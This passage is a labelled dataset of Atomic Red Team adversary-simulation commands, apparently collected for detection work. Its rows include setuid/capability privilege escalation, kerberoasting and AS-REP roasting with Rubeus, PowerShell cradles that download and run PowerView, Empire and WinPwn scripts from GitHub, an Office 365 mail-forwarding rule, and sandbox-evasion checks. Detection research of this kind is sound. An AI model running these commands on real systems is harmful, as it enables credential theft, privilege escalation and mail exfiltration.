#{file_to_setuid} chown root #{file_to_setuid} chmod g+xs #{file_to_setuid},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.001/T1548.001.yaml,Set a SetGID flag on file (freebsd),T1548.001,"[""T1548.001""]",linux,0.9,False,"This test sets the SetGID flag on a file in FreeBSD. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0e04414e22799129c28b8026,cp #{payload} /tmp/cap.c make /tmp/cap sudo setcap cap_setuid=ep /tmp/cap /tmp/cap,cp #{payload} /tmp/cap.c make /tmp/cap sudo setcap cap_setuid=ep /tmp/cap /tmp/cap,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.001/T1548.001.yaml,Make and modify capabilities of a binary,T1548.001,"[""T1548.001""]",linux,0.9,False,"Make and modify [capabilities](https://man7.org/linux/man-pages/man7/capabilities.7.html) of a C source code file. The binary doesn't have to modify the UID, but the binary is given the capability to arbitrarily modify it at any time with `setuid(0)`. Without being owned by root, the binary can set the UID to 0. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5cf2e6d96886b9823165bb08,rm /tmp/cap rm /tmp/cap.c,rm /tmp/cap rm /tmp/cap.c,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.001/T1548.001.yaml,Make and modify capabilities of a binary,T1548.001,"[""T1548.001""]",linux,0.55,True,"Make and modify [capabilities](https://man7.org/linux/man-pages/man7/capabilities.7.html) of a C source code file. The binary doesn't have to modify the UID, but the binary is given the capability to arbitrarily modify it at any time with `setuid(0)`. Without being owned by root, the binary can set the UID to 0. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 94cd1e4e91df5e89a12a5f60,touch #{file_to_setcap} sudo setcap cap_setuid=ep #{file_to_setcap},touch #{file_to_setcap} sudo setcap cap_setuid=ep #{file_to_setcap},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.001/T1548.001.yaml,Provide the SetUID capability to a file,T1548.001,"[""T1548.001""]",linux,0.9,False,"This test gives a file the capability to set UID without using flags. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3859d511734b76b414b1b19b,rm #{file_to_setcap},rm #{file_to_setcap},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.001/T1548.001.yaml,Provide the SetUID capability to a file,T1548.001,"[""T1548.001""]",linux,0.55,True,"This test gives a file the capability to set UID without using flags. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b24d37253b25e215702c2eb1,find /usr/bin -perm -4000,find /usr/bin -perm -4000,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.001/T1548.001.yaml,Do reconnaissance for files that have the setuid bit set,T1548.001,"[""T1548.001""]",linux,0.9,False,"This test simulates a command that can be run to enumerate files that have the setuid bit set ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b4194b18abc2ad5e576abc66,find /usr/bin -perm -2000,find /usr/bin -perm -2000,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.001/T1548.001.yaml,Do reconnaissance for files that have the setgid bit set,T1548.001,"[""T1548.001""]",linux,0.9,False,"This test simulates a command that can be run to enumerate files that have the setgid bit set ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 67ce81c149db76aa9cc98017,"cmd.exe /c ""#{local_folder}\#{local_executable}"" asreproast /outfile:""#{local_folder}\#{out_file}""","cmd.exe /c ""#{local_folder}\#{local_executable}"" asreproast /outfile:""#{local_folder}\#{out_file}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1558.004/T1558.004.yaml,Rubeus asreproast,T1558.004,"[""T1558.004""]",windows,0.9,False,"Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4a107ac6a912d1505fa99a18,"Remove-Item ""#{local_folder}\#{out_file}"" -ErrorAction Ignore","Remove-Item ""#{local_folder}\#{out_file}"" -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1558.004/T1558.004.yaml,Rubeus asreproast,T1558.004,"[""T1558.004""]",windows,0.55,True,"Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9a1a802b3fd41f744d2cf289,[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose,[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1558.004/T1558.004.yaml,Get-DomainUser with PowerView,T1558.004,"[""T1558.004""]",windows,0.9,False,"Utilizing PowerView, run Get-DomainUser to identify domain users. Upon execution, progress and info about users within the domain being scanned will be displayed. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9374e90b2508adf8b0a95751,"iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1') Invoke-Rubeus -Command ""asreproast /format:hashcat /nowrap""","iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1') Invoke-Rubeus -Command ""asreproast /format:hashcat /nowrap""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1558.004/T1558.004.yaml,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,T1558.004,"[""T1558.004""]",windows,0.9,False,PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ff3123031676e4031f8ac363,"$secure_pwd = ""#{password}"" | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ""#{username}"", $secure_pwd Connect-ExchangeOnline -Credential $creds New-InboxRule -Name ""#{rule_name}"" -ForwardTo ""#{forwarding_email}""","$secure_pwd = ""#{password}"" | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ""#{username}"", $secure_pwd Connect-ExchangeOnline -Credential $creds New-InboxRule -Name ""#{rule_name}"" -ForwardTo ""#{forwarding_email}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1114.003/T1114.003.yaml,Office365 - Email Forwarding,T1114.003,"[""T1114.003""]",office-365,0.9,False,"Creates a new Inbox Rule to forward emails to an external user via the ""ForwardTo"" property of the New-InboxRule Powershell cmdlet. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 435431de1db7b36fb9fbf2c7,"$secure_pwd = ""#{password}"" | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ""#{username}"", $secure_pwd Connect-ExchangeOnline -Credential $creds Get-InboxRule | Where-Object { $_.Name -eq ""#{rule_name}"" | ForEach-Object { Remove-InboxRule -Identity $_.Identity -Force -Confirm:$False }","$secure_pwd = ""#{password}"" | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ""#{username}"", $secure_pwd Connect-ExchangeOnline -Credential $creds Get-InboxRule | Where-Object { $_.Name -eq ""#{rule_name}"" | ForEach-Object { Remove-InboxRule -Identity $_.Identity -Force -Confirm:$False }",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1114.003/T1114.003.yaml,Office365 - Email Forwarding,T1114.003,"[""T1114.003""]",office-365,0.55,True,"Creates a new Inbox Rule to forward emails to an external user via the ""ForwardTo"" property of the New-InboxRule Powershell cmdlet. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 94126dbb0505c60c7bc3d977,"# Check for common debugger processes $debuggerProcesses = Get-Process | Where-Object { $_.ProcessName -match ""dbg"" -or $_.ProcessName -match ""debug"" } # Check for debugging flags $debuggingFlags = [System.Diagnostics.Debugger]::IsAttached","# Check for common debugger processes $debuggerProcesses = Get-Process | Where-Object { $_.ProcessName -match ""dbg"" -or $_.ProcessName -match ""debug"" } # Check for debugging flags $debuggingFlags = [System.Diagnostics.Debugger]::IsAttached",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1622/T1622.yaml,Detect a Debugger Presence in the Machine,T1622,"[""T1622""]",windows,0.9,False,Detecting a running debugger process or if the debugger is attached to a process via PowerShell,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 22f303fcaf20ccf3f89d7027,[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing) Invoke-Kerberoast | fl,[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing) Invoke-Kerberoast | fl,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1558.003/T1558.003.yaml,Request for service tickets,T1558.003,"[""T1558.003""]",windows,0.9,False,"This test uses the Powershell Empire Module: Invoke-Kerberoast.ps1 The following are further sources and credits for this attack: [Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/) [Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/) when executed successfully , the test displays available services with their hashes. If the testing domain doesn't have any service principal name configure",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4600b86fd216d18adaed1a7a,"klist purge cmd.exe /c ""#{local_folder}\#{local_executable}"" kerberoast #{flags} /outfile:""#{local_folder}\#{out_file}""","klist purge cmd.exe /c ""#{local_folder}\#{local_executable}"" kerberoast #{flags} /outfile:""#{local_folder}\#{out_file}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1558.003/T1558.003.yaml,Rubeus kerberoast,T1558.003,"[""T1558.003""]",windows,0.9,False,"Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b7268db67f4dbb294e002b5c,"Remove-Item ""#{local_folder}\#{out_file}"" -ErrorAction Ignore","Remove-Item ""#{local_folder}\#{out_file}"" -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1558.003/T1558.003.yaml,Rubeus kerberoast,T1558.003,"[""T1558.003""]",windows,0.55,True,"Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review df71086c167447bbbd964ce0,setspn -T #{domain_name} -Q */*,setspn -T #{domain_name} -Q */*,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1558.003/T1558.003.yaml,Extract all accounts in use as SPN using setspn,T1558.003,"[""T1558.003""]",windows,0.9,False,"The following test will utilize setspn to extract the Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack. A successful execution will output all the SPNs for the related domain. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review aae6efb306d9e8562b4108e5,"Add-Type -AssemblyName System.IdentityModel $ComputerFQDN=$env:LogonServer.trimStart('\') + ""."" + $env:UserDnsDomain New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList ""HTTP/$ComputerFQDN""","Add-Type -AssemblyName System.IdentityModel $ComputerFQDN=$env:LogonServer.trimStart('\') + ""."" + $env:UserDnsDomain New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList ""HTTP/$ComputerFQDN""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1558.003/T1558.003.yaml,Request A Single Ticket via PowerShell,T1558.003,"[""T1558.003""]",windows,0.9,False,"The following test will utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer. This behavior is typically used during a kerberos or silver ticket attack. A successful execution will output the SPNs for the endpoint in question. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 01f8ae8e00a3caa2ca341d8f,"Add-Type -AssemblyName System.IdentityModel setspn.exe -T #{domain_name} -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }","Add-Type -AssemblyName System.IdentityModel setspn.exe -T #{domain_name} -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1558.003/T1558.003.yaml,Request All Tickets via PowerShell,T1558.003,"[""T1558.003""]",windows,0.9,False,"The following test will utilize native PowerShell Identity modules to query the domain to extract allthe Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack. A successful execution will output the SPNs for the domain in question. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3ecbdae5d951cb5ae886629f,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Kerberoasting -consoleoutput -noninteractive,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Kerberoasting -consoleoutput -noninteractive,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1558.003/T1558.003.yaml,WinPwn - Kerberoasting,T1558.003,"[""T1558.003""]",windows,0.9,False,Kerberoasting technique via function of WinPwn,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 03a5d124f421309e69be3185,"iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1') Invoke-Rubeus -Command ""kerberoast /format:hashcat /nowrap""","iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1') Invoke-Rubeus -Command ""kerberoast /format:hashcat /nowrap""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1558.003/T1558.003.yaml,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,T1558.003,"[""T1558.003""]",windows,0.9,False,PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2c519d21c09a69fb39b77613,"if (systemd-detect-virt) then echo ""Virtualization Environment detected""; fi; if (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo ""Virtualization Environment detected""; fi;","if (systemd-detect-virt) then echo ""Virtualization Environment detected""; fi; if (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo ""Virtualization Environment detected""; fi;",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1497.001/T1497.001.yaml,Detect Virtualization Environment (Linux),T1497.001,"[""T1497.001""]",linux,0.9,False,"systemd-detect-virt detects execution in a virtualized environment. At boot, dmesg stores a log if a hypervisor is detected. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c0d7f0b3674bd122fc71b6db,"if [ ""$(sysctl -n hw.hv_vendor)"" != """" ]; then echo ""Virtualization Environment detected""; fi","if [ ""$(sysctl -n hw.hv_vendor)"" != """" ]; then echo ""Virtualization Environment detected""; fi",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1497.001/T1497.001.yaml,Detect Virtualization Environment (FreeBSD),T1497.001,"[""T1497.001""]",linux,0.9,False,"Detects execution in a virtualized environment. At boot, dmesg stores a log if a hypervisor is detected. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7270f466f12cadd7dd218440,"$error.clear() Get-WmiObject -Query ""SELECT * FROM MSAcpi_ThermalZoneTemperature"" -ErrorAction SilentlyContinue if($error) {echo ""Virtualization Environment detected""}","$error.clear() Get-WmiObject -Query ""SELECT * FROM MSAcpi_ThermalZoneTemperature"" -ErrorAction SilentlyContinue if($error) {echo ""Virtualization Environment detected""}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1497.001/T1497.001.yaml,Detect Virtualization Environment (Windows),T1497.001,"[""T1497.001""]",windows,0.9,False,"Windows Management Instrumentation(WMI) objects contains system information which helps to detect virtualization. This command will specifically attempt to get the CurrentTemperature value from this object and will check to see if the attempt results in an error that contains the word supported. This is meant to find the result of Not supported, which is the result if run in a virtual machine ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c232e3fe955916cc9a8112c2,if (ioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo 'Virtualization Environment detected'; fi;,if (ioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo 'Virtualization Environment detected'; fi;,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1497.001/T1497.001.yaml,Detect Virtualization Environment via ioreg,T1497.001,"[""T1497.001""]",macos,0.9,False,"ioreg contains registry entries for all the device drivers in the system. If it's a virtual machine, one of the device manufacturer will be a Virtualization Software. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2d225e3b67b7d045bc879a7d,"$Manufacturer = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty ""Manufacturer"" $Model = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty ""Model"" if((($Manufacturer.ToLower() -eq ""microsoft corporation"") -and ($Model.ToLower().contains(""virtual""))) -or ($Manufacturer.ToLower().contains(""vmware"")) -or ($Model.ToLower() -eq ""virtualbox"")) {write-host ""Virtualization environment detected!""} else {write-host ""No virtualization environment detected!""}","$Manufacturer = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty ""Manufacturer"" $Model = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty ""Model"" if((($Manufacturer.ToLower() -eq ""microsoft corporation"") -and ($Model.ToLower().contains(""virtual""))) -or ($Manufacturer.ToLower().contains(""vmware"")) -or ($Model.ToLower() -eq ""virtualbox"")) {write-host ""Virtualization environment detected!""} else {write-host ""No virtualization environment detected!""}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1497.001/T1497.001.yaml,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),T1497.001,"[""T1497.001""]",windows,0.9,False,"Windows Management Instrumentation(WMI) objects contain system information which helps to detect virtualization. This test will get the model and manufacturer of the machine to determine if it is a virtual machine, such as through VMware or VirtualBox. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 64637fcb3fde324f366991fd,"if [ ""$(sysctl -n hw.model | grep -v 'Mac')"" != """" ]; then echo 'Virtualization Environment detected'; fi;","if [ ""$(sysctl -n hw.model | grep -v 'Mac')"" != """" ]; then echo 'Virtualization Environment detected'; fi;",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1497.001/T1497.001.yaml,Detect Virtualization Environment using sysctl (hw.model),T1497.001,"[""T1497.001""]",macos,0.9,False,"sysctl hw.model will return the model name of the hardware(Macmini8,1, MacBookAir10,1, etc.) in case of native Apple hardware but will return the hypervisor name (VMware7,0). Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#hardware-model ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2b6719cf27973d604f60be48,"if [ ""$(csrutil status | grep -v 'enabled')"" != """" ]; then echo 'Possible Virtualization Environment detected'; fi;","if [ ""$(csrutil status | grep -v 'enabled')"" != """" ]; then echo 'Possible Virtualization Environment detected'; fi;",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1497.001/T1497.001.yaml,Check if System Integrity Protection is enabled,T1497.001,"[""T1497.001""]",macos,0.9,False,"The latest versions of macOS have the System Integrity Protection feature (SIP). If a sandbox uses a non-signed kernel extension for monitoring purposes the, SIP feature must be disabled to load this kind of kernel extension. Malware may check if the SIP is enabled. Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#sip ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f322a1dca36f3471e3cd2b72,"if [ ""$(system_profiler SPHardwareDataType | grep ""Model Identifier"" | grep -v 'Mac')"" != """" ]; then echo 'Virtualization Environment detected'; fi;","if [ ""$(system_profiler SPHardwareDataType | grep ""Model Identifier"" | grep -v 'Mac')"" != """" ]; then echo 'Virtualization Environment detected'; fi;",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1497.001/T1497.001.yaml,Detect Virtualization Environment using system_profiler,T1497.001,"[""T1497.001""]",macos,0.9,False,"system_profiler provides system hardware and software configuration and the Model Identifier should provide the value similar to (sysctl -n hw.model). We should be able to find whether virtualization is enabled by checking whether the Model Identifier does not contain ""Mac"". ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review df2355c07252dba95678f2d3,fsutil behavior set SymlinkEvaluation R2L:1 fsutil behavior set SymlinkEvaluation R2R:1,fsutil behavior set SymlinkEvaluation R2L:1 fsutil behavior set SymlinkEvaluation R2R:1,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1222/T1222.yaml,Enable Local and Remote Symbolic Links via fsutil,T1222,"[""T1222""]",windows,0.9,False,"Use fsutil to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths. [reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3331885dd6abf4495686acd6,fsutil behavior set SymlinkEvaluation R2L:0 fsutil behavior set SymlinkEvaluation R2R:0,fsutil behavior set SymlinkEvaluation R2L:0 fsutil behavior set SymlinkEvaluation R2R:0,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1222/T1222.yaml,Enable Local and Remote Symbolic Links via fsutil,T1222,"[""T1222""]",windows,0.55,True,"Use fsutil to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths. [reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/) ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7d8a00b923829e4517ae017a,"reg add ""HKLM\SYSTEM\CurrentControlSet\Control\FileSystem"" /v SymlinkRemoteToLocalEvaluation /t REG_DWORD /d ""1"" /f reg add ""HKLM\SYSTEM\CurrentControlSet\Control\FileSystem"" /v SymlinkRemoteToRemoteEvaluation /t REG_DWORD /d ""1"" /f","reg add ""HKLM\SYSTEM\CurrentControlSet\Control\FileSystem"" /v SymlinkRemoteToLocalEvaluation /t REG_DWORD /d ""1"" /f reg add ""HKLM\SYSTEM\CurrentControlSet\Control\FileSystem"" /v SymlinkRemoteToRemoteEvaluation /t REG_DWORD /d ""1"" /f",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1222/T1222.yaml,Enable Local and Remote Symbolic Links via reg.exe,T1222,"[""T1222""]",windows,0.9,False,"Use reg.exe to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths. [reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 992bbc244bd0c2a14eaebfe4,"reg add ""HKLM\SYSTEM\CurrentControlSet\Control\FileSystem"" /v SymlinkRemoteToLocalEvaluation /t REG_DWORD /d ""0"" /f reg add ""HKLM\SYSTEM\CurrentControlSet\Control\FileSystem"" /v SymlinkRemoteToRemoteEvaluation /t REG_DWORD /d ""0"" /f","reg add ""HKLM\SYSTEM\CurrentControlSet\Control\FileSystem"" /v SymlinkRemoteToLocalEvaluation /t REG_DWORD /d ""0"" /f reg add ""HKLM\SYSTEM\CurrentControlSet\Control\FileSystem"" /v SymlinkRemoteToRemoteEvaluation /t REG_DWORD /d ""0"" /f",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1222/T1222.yaml,Enable Local and Remote Symbolic Links via reg.exe,T1222,"[""T1222""]",windows,0.55,True,"Use reg.exe to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths. [reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/) ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c22881fc1e6f95dd24f79f40,New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToLocalEvaluation -PropertyType DWORD -Value 1 -Force -ErrorAction Ignore New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToRemoteEvaluation -PropertyType DWORD -Value 1 -Force -ErrorAction Ignore,New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToLocalEvaluation -PropertyType DWORD -Value 1 -Force -ErrorAction Ignore New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToRemoteEvaluation -PropertyType DWORD -Value 1 -Force -ErrorAction Ignore,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1222/T1222.yaml,Enable Local and Remote Symbolic Links via Powershell,T1222,"[""T1222""]",windows,0.9,False,"Use Powershell to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths. [reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 60dc0d08e1a3bae8e0a5b260,New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToLocalEvaluation -PropertyType DWORD -Value 0 -Force -ErrorAction Ignore New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToRemoteEvaluation -PropertyType DWORD -Value 0 -Force -ErrorAction Ignore,New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToLocalEvaluation -PropertyType DWORD -Value 0 -Force -ErrorAction Ignore New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToRemoteEvaluation -PropertyType DWORD -Value 0 -Force -ErrorAction Ignore,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1222/T1222.yaml,Enable Local and Remote Symbolic Links via Powershell,T1222,"[""T1222""]",windows,0.55,True,"Use Powershell to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths. [reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/) ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 95c4050a43eef174d9f381f7,"sudo sed -i ""#{index}s,^,#{pam_rule}\n,g"" #{path_to_pam_conf}","sudo sed -i ""#{index}s,^,#{pam_rule}\n,g"" 